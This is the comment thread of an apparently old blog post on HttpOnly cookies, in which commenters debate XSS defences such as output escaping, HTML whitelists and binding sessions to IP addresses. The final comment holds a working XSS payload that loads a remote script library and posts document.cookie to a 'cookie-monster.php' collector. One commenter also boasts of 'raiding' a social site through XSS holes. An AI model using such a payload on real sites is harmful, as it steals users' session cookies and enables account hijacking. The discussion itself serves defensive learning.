Protecting Your Cookies: HttpOnly

I’m not sure why you people are being so hard headed. He didn’t say that he didn’t ALSO fix the sanitizer. But like all things in web security adding the HttpOnly flag raises the bar. Why not do it? He isn’t advocating using HttpOnly in lieu of other good security measures.

As for sanitizing input verses output I prefer to sanitize output. There are too many other systems downstream that are impacted by sanitizing the input. I write enterprise systems, not forums. There is a big difference. I can’t pass a company name of Smith%32s%20Dairy to some back end COBOL system. They wouldn’t know what to do with it.

For those of you that decide to sanitize your input, it must be nice to write web applications that live in a vacuum…

The Web needs an architectural do-over.

With recent vulnerabilities like the Gmail vulnerability I’m really starting to question whether it is possible to write a secure web app that people will still want to use. Even if it is, it seems like it is little more than a swarm of technologies that interact in far more ways than are immediately obvious.

Why not keep a dictionary that maps the cookie credential to the IP
used when the credential was granted, and make sure that the IP
matches the dictionary entry on every page access?

Most of us get our IP addresses through DHCP, which means they can change whenever our system (or router) is rebooted.

I’m still quite leery of your sanitiser, for the reasons I described on RefactorMyCode: you’re doing blacklisting even if you think you’re doing whitelisting. Your blacklist is more or less anything that looks like BLAH BLAH X BLAH, where X isn’t on the whitelist. As you can see, it’s very hard to write that rule correctly. Your bouncer is still kicking bad guys out of the queue. Instead your bouncer should be picking up good guys and carrying them through the door. If the bouncer messes up, the default behaviour should be nobody gets in, not everybody getting in!

As an interesting side note to those who say you should sanitize late rather than early:

I have run into all kinds of XSS when opening tables in my database. Yes, I learned that opening said tables in PHPMyAdmin might not be a good idea.

That was an interesting experience to be sure.

I have to agree with what most people are saying. Allowing direct HTML posting that other users can see is sure to cause at least headaches, if not major problems. You’re better off using some kind of wiki system, or some kind of subset of HTML, where only the tags you are interested in are allowed.

Hey, But how do I set the HttpOnly flag on cookies. I certainly did not find it in the preferences/options dialog.

IP spoofing over UDP = easy, IP spoofing over TCP = hard

The biggest problem in security is that a lot of people think that hard is the same as impossible. It is not. We can patch this and that hole after we’ve completed implementing our design and make it harder to attack our system, but we’ll never really know if we’re 100% safe.

In that regard, giving up is not lame. Playing catch-up is better than not. It’s also better than going back to the drawing board when you’re well into beta (aka scope creep), unless you have infinite budget. I do believe, though, that in the design stage, as Schneier says, security is about trade-offs. If a feature introduces security risks that are not absolutely not tolerable, then it might indeed be a good idea to drop it altogether, if designing built-in protection against a class of attacks is not feasible.

IP spoofing over UDP = easy, IP spoofing over TCP = hard

As someone who has written an IP stack, I’m not really sure what about TCP makes it particularly hard. I’m not saying it isn’t, I just don’t see why it would be offhand.

It might (might) be tough to push aside the rightful IP holder from an established connection. However, initiating a connection with a spoofed IP should be just as easy as spoofing your IP in UDP and getting the victim to respond to you.

Friends dont let friends allow XSS attacks.

When you emit a session id, record the IP. Naturally you also emitted it over ssl, in which case you record the cert they were granted for the session. Therefore each request is validated by IP and cert?

It’s amazing how easily cookies can be hijacked. Shouldn’t there be some way to encrypt them too so that even if they do manage to get the cookie, it’s useless?

I have run into all kinds of XSS when opening tables
in my database. Yes, I learned that opening said tables
in PHPMyAdmin might not be a good idea.

That just shows you that PHPMyAdmin is not a safe program. The PHPMyAdmin program could not possibly know whether or not the data in the database has been scrubbed. So it should default to scrubbing it on output. It also can’t enforce the rule that all input should be scrubbed before putting it into the database.

It also shows that all programs fall into this same category. There could be an SQL injection vulnerability in your code that lets the user force data into the database unscrubbed. So ALL programs (including yours) should make the assumption that the data could be tainted and scrub it before outputting it to the screen.

It is the one true way to be safe. Making assumptions is always a bad idea. Be sure. Scrub all output.

@omalley

If you don’t allow unsafe characters, then just completely remove them from input. Done

Think about what this means. What is an unsafe character?
In the context of the user’s message, nothing. It’s only when you go to insert that message directly into a HTML/JS document that certain characters take on a different meaning. And so at that time you escape them. This way the user’s message displays as they intended it AND it doesn’t break the HTML. Everyone wins.

It’s the same for when you’re putting it into SQL, or into a shell-command, or into a URL, etc. You can’t store your data escaped for every single purpose in your DB, you need to do the escaping exactly when it’s needed and keep your original data raw and intact.

Your policy of stripping unsafe characters gets in the way of the user’s perfectly legitimate message. And there’s absolutely no reason for that.

You store user input verbatim, and you always remember to escape when displaying output, and you hope input cleaning works 100%

There is no hope required. You don’t have to always remember if you have a standard method of building DB queries and building HTML documents/templating, and it’s tested. And you should have this.

Where and when to escape (assuming a DB store):

  1. Untrusted data comes in
  2. Validate it (do NOT alter it)
    And, if it’s valid
  3. Store it (escape for SQL here)

later, if you want to display it in a HTML page:
retrieve from DB and escape for HTML

or, if you want to use it in a unix command line:
retrieve from DB and escape for shell

or, into a url:
retrieve from DB and URL encode

etc…

The key is not MODIFYING the user’s data. Just accept or reject. Then you escape if necessary when you use it in different contexts.

Now you can do anything you want with your data. You don’t have to impose confusing constraints on what your users can and can’t say.

Good comments. Are there any web pages which serve as checklists against XSS so we asp.net developers can implemenet all these secure ideas?

(Jeff, I saw a comment from you which didn’t have a different bg color)

I absolutely agree with correct above. Too many times I see programs that won’t let you include single quotes or other such characters because they consider them to be dangerous. There is no point in that.

As I said above you need to consider all data to potentially be tainted. There is no way to guarantee that the data came from a user and passed through your input scrubber. It could have been inserted using an SQL injection attack or could have come from some COBOL/RPG program upstream. So you have to scrub it on output anyway. Why scrub it both places and end up causing headaches for other systems that you integrate with?

@O’Malley

you said:

@bex you just screwed anyone who sits behind a proxy server.

um… no.

A proxy means multiple usernames sharing one IP. That’s totally fine. Its no different than me running two browsers, and logged in as two users. My example blocks multiple IPs sharing one username. Totally different. And as @Clifton says, IP spoofing over TCP is pretty hard… especially if you rotate the session ID.

Back to the issue of sanitizing, I again agree with @Clifton. You don’t sanitize input: you FRIGGING REJECT it!

In other words, escape ALL angle brackets, unless the its from a string that EXACTLY MATCHES safe HTML, like:

b/b
i/i
ul/ul
ol/ol
li/li
pre/pre
code/code

Don’t allow ANYTHING fancy in between the angle brackets. No attributes. No styles. No quotes. No spaces. No parenthesis. Yes, its strict, but who cares?

Being helpful is a security hole.

hehe… I recall raiding a certain social networking website (none of the obvious). someone in the channel we were in found a lot of XSS vulnerabilities. used the same setup described in this blog, plus I recommended a similar FF extension, Modify HTTP Headers. Pretty good read, unlike the past entries…

You don’t sanitize input: you FRIGGING REJECT it!

And if the requirements of your application include the ability to accept such input… then what do you suggest? I just love how programmers think that they get the final say when it comes to functional requirements.

Hell, users don’t need to be able to enter single quotes anyway. If I strip single quotes out of the input then my crappy anti-SQL injection code hack will actually appear to work sometimes.

@bex

A proxy means multiple usernames sharing one IP. That’s totally fine.

What I think O’malley was talking about is large ISPs (e.g. AOL) who may push their users through a different proxy IP on every single request. These are the users you’d be screwing over. A few large European ISPs do this too.

With AOL, they maintain a public list of those proxy subnets (http://webmaster.info.aol.com/proxyinfo.html) so if it’s an issue you can make your application treat all those IP addresses as one big IP. None of the other ISPs maintain such a list though, so those users would continue to get screwed.

Your method does add some extra protection but it inconveniences a lot of users. In any business I’ve worked in, kicking out all of AOL is not something management will allow. And the places where you need the security the most (e.g. online banks), that’s just not an option.

The amount of protection you’re adding is debatable too. You’re still allowing people behind the same single proxy IP to steal each others sessions. And at some ISPs, that can be a hell of a lot of people.

I’m not sure the tradeoff for pissing off a bunch of other customers is worth it.

A better approach, depending on your application, is to require re-entry of the user’s password for critical actions.

It really depends on the application though, and what’s at stake. Dealing with a stolen session ID at a pr0n site is different to dealing with one at a bank.

As others have pointed out, scrubbing input data is not the correct approach. Here’s why:

  1. The way data needs to be scrubbed depends on the context of how it is going to be used. You can’t know up front how the data will ultimately be used to you can’t make the proper decision of how it should be scrubbed when it is entered. For example, the OWASP sample scrubber routines distinguish between data that is going to be output as JavaScript, HTML Attributes, and raw HTML (as well as a couple others).

  2. You can’t guarantee that all data that ends up in your database will have come through your input scrubber. It can come from another compromised system, sql injection, or even flaws in your own input scrubber.

  3. Once you find out that XSS data exists in your database it is nearly impossible to fix. For example, if you find out that your original input scrubber was flawed you now have to figure out how to get rid of all of the problem data. If you use output scrubbing instead of input scrubbing you can simply alter your output scrubber and leave the data alone. Always assuming that the data could be bad means that it can stay bad in the database without impacting the application.

  4. There is no reason to scrub data more than once. You have to do it on output anyway for the reasons listed above.

  5. Other systems are likely to need the data and will puke if it is already scrubbed. Even if you don’t interface with any other systems now you never know when your boss is going to come to you and say that his boss wants to be able to run some simple queries using Crystal Reports in which your scrubbed input data can’t easily be unscrubbed before use.

  6. Scrubbed data can mess up certain types of SQL statements. For example, depending on your scrubbing mechanism, sorting might be broken. Like clauses may also not work correctly. You want the data in your database to be in a pure unaltered form for the best results.

These are just a few reasons. There could be many more.

Your JavaScript from the remote server is hardly ideal. Here is some better code I developed while researching this security issue. In order to create a deliberately vulnerable ASP.NET page I had to use two page directives: ValidateRequest=false and enableEventValidation=false

jscript = document.createElement(script);   
jscript.setAttribute(type, text/javascript); 
jscript.setAttribute(djConfig, isDebug: true);
jscript.setAttribute(src, <a href="http://o.aolcdn.com/dojo/1.1.1/dojo/dojo.xd.js);">http://o.aolcdn.com/dojo/1.1.1/dojo/dojo.xd.js);</a>   
document.getElementsByTagName('head')[0].appendChild(jscript); 
window.onload = func;
function func() {
	dojo.xhrPost({url:<a href="http://localhost/study/php/cookie-monster.php,">http://localhost/study/php/cookie-monster.php,</a> content:{u:document.links[0].innerText, l:document.links[0], c:document.cookie}});
}